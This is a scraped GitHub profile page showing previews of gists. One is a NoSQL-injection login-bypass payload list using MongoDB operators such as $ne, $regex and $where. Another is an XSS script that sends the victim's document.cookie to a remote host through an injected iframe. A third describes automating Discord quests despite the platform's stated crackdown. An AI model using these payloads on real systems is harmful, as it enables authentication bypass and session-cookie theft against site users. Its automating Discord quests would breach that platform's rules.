Skip to content

Instantly share code, notes, and snippets.

View NoobGajen's full-sized avatar
💭
❄️Processing 。。。

Gajendra Mahato NoobGajen

💭
❄️Processing 。。。
View GitHub Profile
@aamiaa
aamiaa / CompleteDiscordQuest.md
Last active May 16, 2026 03:51
Complete Recent Discord Quest

Caution

As of April 7th 2026, Discord has expressed their intent to crack down on automating quest completion.

Some users have received the following system message:

image

There isn't much I can do to make the script undetected, so use it at your own risk, as you most likely WILL get flagged by doing so.

Complete Recent Discord Quest

@rootsploit
rootsploit / NoSQLi-login-bypass.txt
Last active February 10, 2024 06:41
Login Bypass methodology with NoSQLi
Bypass with Operator:
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin$password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
@ahhh
ahhh / xss.js
Last active January 8, 2025 16:26
xss send cookie to remote site
<script type="text/javascript">
document.write("<iframe src='http://remotehost/whatever.ok?cookie="+document.cookie+"'></iframe>");
</script>